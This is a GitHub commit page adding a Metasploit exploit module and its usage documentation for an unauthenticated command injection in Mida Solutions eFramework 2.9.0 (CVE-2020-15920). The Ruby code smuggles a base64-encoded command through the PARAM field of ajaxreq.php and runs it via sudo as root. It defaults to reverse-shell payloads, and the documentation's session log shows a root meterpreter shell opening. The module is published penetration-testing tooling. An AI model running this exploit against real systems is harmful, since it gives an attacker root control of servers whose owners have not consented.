-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #14074, add Mida eFramework command injection
- Loading branch information
Showing
2 changed files
with
198 additions
and
0 deletions.
There are no files selected for viewing
64 changes: 64 additions & 0 deletions
64
documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
## Vulnerable Application | ||
|
||
This module exploits a command injection vulnerability in | ||
[Mida Solutions eFramework](https://www.midasolutions.com/) | ||
version 2.9.0 and prior. | ||
|
||
The `ajaxreq.php` file allows unauthenticated users to inject | ||
arbitrary commands in the `PARAM` parameter to be executed as | ||
the apache user. The sudo configuration permits the apache user | ||
to execute any command as root without providing a password, | ||
resulting in privileged command execution as root. | ||
|
||
This module has been successfully tested on Mida Solutions | ||
eFramework-C7-2.9.0 virtual appliance. | ||
|
||
Download: | ||
|
||
http://ova-efw.midasolutions.com/ | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce` | ||
1. Do: `set RHOSTS [IP]` | ||
1. Do: `set payload [payload]` | ||
1. Do: `set LHOST [IP]` | ||
1. Do: `exploit` | ||
|
||
## Options | ||
|
||
### TARGETURI | ||
|
||
Base path to eFramework (Default: `/`) | ||
|
||
## Scenarios | ||
|
||
``` | ||
msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce | ||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123 | ||
rhosts => 172.16.191.123 | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check | ||
[+] 172.16.191.123:443 - The target is vulnerable. | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165 | ||
lhost => 172.16.191.165 | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run | ||
[*] Started reverse TCP handler on 172.16.191.165:4444 | ||
[*] Executing automatic check (disable AutoCheck to override) | ||
[+] The target is vulnerable. | ||
[*] Sending stage (3008420 bytes) to 172.16.191.123 | ||
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400 | ||
[*] Command Stager progress - 100.00% done (897/897 bytes) | ||
meterpreter > getuid | ||
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0) | ||
meterpreter > sysinfo | ||
Computer : 172.16.191.123 | ||
OS : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > | ||
``` |
134 changes: 134 additions & 0 deletions
134
modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,134 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
prepend Msf::Exploit::Remote::AutoCheck | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection', | ||
'Description' => %q{ | ||
This module exploits a command injection vulnerability in Mida | ||
Solutions eFramework version 2.9.0 and prior. | ||
The `ajaxreq.php` file allows unauthenticated users to inject | ||
arbitrary commands in the `PARAM` parameter to be executed as | ||
the apache user. The sudo configuration permits the apache user | ||
to execute any command as root without providing a password, | ||
resulting in privileged command execution as root. | ||
This module has been successfully tested on Mida Solutions | ||
eFramework-C7-2.9.0 virtual appliance. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'elbae', # discovery and exploit | ||
'bcoles', # Metasploit | ||
], | ||
'References' => | ||
[ | ||
['CVE', '2020-15920'], | ||
['EDB', '48768'], | ||
['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'], | ||
], | ||
'Payload' => { 'BadChars' => "\x00" }, | ||
'Targets' => | ||
[ | ||
[ | ||
'Linux (x86)', { | ||
'Arch' => ARCH_X86, | ||
'Platform' => 'linux', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' | ||
} | ||
} | ||
], | ||
[ | ||
'Linux (x64)', { | ||
'Arch' => ARCH_X64, | ||
'Platform' => 'linux', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' | ||
} | ||
} | ||
], | ||
[ | ||
'UNIX (cmd)', { | ||
'Arch' => ARCH_CMD, | ||
'Platform' => 'unix', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'cmd/unix/reverse_bash' | ||
} | ||
} | ||
] | ||
], | ||
'Privileged' => true, | ||
'DisclosureDate' => '2020-07-24', | ||
'DefaultOptions' => { | ||
'RPORT' => 443, | ||
'SSL' => true | ||
}, | ||
'DefaultTarget' => 1, | ||
'Notes' => | ||
{ | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
} | ||
) | ||
) | ||
register_options([ | ||
OptString.new('TARGETURI', [true, 'Base path to eFramework', '/']) | ||
]) | ||
end | ||
|
||
def check | ||
res = execute_command('id') | ||
|
||
unless res | ||
return CheckCode::Safe('Connection failed') | ||
end | ||
|
||
unless res.body.include?('uid=') | ||
return CheckCode::Safe('Target is not vulnerable') | ||
end | ||
|
||
CheckCode::Vulnerable | ||
end | ||
|
||
def execute_command(cmd, _opts = {}) | ||
vars_post = { | ||
'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample, | ||
'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh" | ||
} | ||
|
||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'), | ||
'vars_post' => vars_post | ||
}, 5) | ||
|
||
if res && !res.body.blank? | ||
vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}") | ||
end | ||
|
||
res | ||
end | ||
|
||
def exploit | ||
if target.arch.first == ARCH_CMD | ||
execute_command(payload.encoded) | ||
else | ||
execute_cmdstager(linemax: 1_500, background: true) | ||
end | ||
end | ||
end |